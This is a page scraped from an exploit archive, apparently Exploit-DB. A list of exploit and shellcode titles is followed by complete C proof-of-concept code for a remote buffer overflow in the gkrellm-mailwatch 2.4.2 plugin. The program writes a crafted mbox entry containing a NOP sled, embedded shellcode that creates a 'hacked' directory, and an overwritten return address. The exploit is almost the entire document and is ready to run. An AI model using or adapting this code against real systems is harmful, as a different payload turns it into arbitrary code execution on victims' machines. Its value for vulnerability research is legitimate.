
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
123 lines
No EOL
3.5 KiB
C
123 lines
No EOL
3.5 KiB
C
// source: https://www.securityfocus.com/bid/8118/info
|
|
|
|
It has been reported that the Mailwatch plugin for GKrellM is vulnerable to a remotely exploitable buffer overflow. This may permit the execution of arbitrary code with the privileges of the GKrellM program.
|
|
|
|
/*
|
|
* Proof of Concept code for a buffer overflow in gkrellm plugin gkrellm-mailwatch 2.4.2
|
|
*
|
|
* Overflow occurs in when processing the "From " (not "From: ")
|
|
* field of the email. This is remotely exploitable if you can pass
|
|
* shellcode through the mail servers with out it getting foobar'ed
|
|
* in the process.
|
|
*
|
|
* Since this is just POC, this will create a directory called hacked in gkrellm's CWD.
|
|
*
|
|
* One last note, it appends to the file you create, so feel free to append to
|
|
* your /var/spool/mail entry.
|
|
*/
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
|
|
#define RET 0xbffff36d
|
|
#define NOP 0x90
|
|
#define LEN 520
|
|
|
|
/* Zillion's mkdir hacked from www.safemode.org */
|
|
char code[]=
|
|
"\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
|
|
"\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
|
|
"\x61\x63\x6b\x65\x64\x23";
|
|
|
|
|
|
int main(int argc, char **argv) {
|
|
int i = 0, offset = 0;
|
|
char ch, *mfile = NULL, *p = NULL, buf[5 + LEN + 6 + 2 + 3 + 1 + 3 + 2 + 1 + 8 + 1 + 4 + 2]; // From %s@foo.bar Thu Jun 26 16:45:16 2003\n\0
|
|
long ret = RET, *paddr = NULL;
|
|
FILE *fd;
|
|
|
|
if(argc < 2) {
|
|
fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]\n", argv[0]);
|
|
exit(1);
|
|
}
|
|
|
|
while((ch = getopt(argc, argv, "m:o:h")) != -1) {
|
|
switch(ch) {
|
|
case 'h':
|
|
fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]\n", argv[0]);
|
|
exit(1);
|
|
break;
|
|
|
|
case 'o':
|
|
ret -= atoi(optarg);
|
|
break;
|
|
|
|
case 'm':
|
|
if(!(mfile = malloc(strlen(optarg)+1))) {
|
|
perror("malloc");
|
|
exit(1);
|
|
}
|
|
strcpy(mfile, optarg);
|
|
break;
|
|
}
|
|
}
|
|
|
|
if(!mfile) {
|
|
fprintf(stderr, "usage: %s <-m outfile> [-o offset] [-h]\n", argv[0]);
|
|
exit(1);
|
|
}
|
|
|
|
fprintf(stderr, "[+] ret 0x%lx\n", ret);
|
|
|
|
strcpy(buf, "From ");
|
|
p = buf + 5;
|
|
|
|
// nops
|
|
for(i=0; i<LEN-strlen(code)-4; i++)
|
|
*(p++) = NOP;
|
|
|
|
// shellcode
|
|
for(i=0; i<strlen(code); i++)
|
|
*(p++) = code[i];
|
|
|
|
// address
|
|
paddr = (long *)p;
|
|
for(i=0; i<4; i+=4)
|
|
*(paddr++) = ret;
|
|
|
|
// terminate and concatenate
|
|
*(p+4) = 0;
|
|
strcat(buf, "@foo.bar Thu Jun 26 16:45:16 2003\n");
|
|
|
|
// check for an outfile, otherwise send to stdout
|
|
if(mfile) {
|
|
if(!(fd = fopen(mfile, "a"))) {
|
|
perror("fopen");
|
|
exit(1);
|
|
}
|
|
fprintf(stderr, "[+] out %s\n", mfile);
|
|
} else {
|
|
fd = stdout;
|
|
fprintf(stderr, "[+] out stdout\n");
|
|
}
|
|
|
|
fputs(buf, fd);
|
|
fputs("Return-Path: <root@foo.bar>\n", fd);
|
|
fputs("Received: from localhost (localhost [127.0.0.1])", fd);
|
|
fputs("\tby localhost (8.12.4/8.12.4) with ESMTP id h5QNPG2q003945\n", fd);
|
|
fputs("\tfor <root@foo.bar>; Thu, 26 Jun 2003 16:45:16 -0700\n", fd);
|
|
fputs("Received: (from root@foo.bar)\n", fd);
|
|
fputs("\tby localhost (8.12.4/8.12.4/Submit) id h5QNPGuc004172\n", fd);
|
|
fputs("\tfor root; Thu, 26 Jun 2003 16:45:16 -0700\n", fd);
|
|
fputs("Date: Thu, 26 Jun 2003 16:45:12 -0700\n", fd);
|
|
fputs("From: root@foo.bar\n", fd);
|
|
fputs("Message-Id: <200306262325.h5QNPGuc003744@localhost>\n", fd);
|
|
fputs("To: root@foo.bar\n", fd);
|
|
fputs("Subject: foobar\n\n", fd);
|
|
fputs("foobar\n\n", fd);
|
|
|
|
fclose(fd);
|
|
free(mfile);
|
|
exit(0);
|
|
} |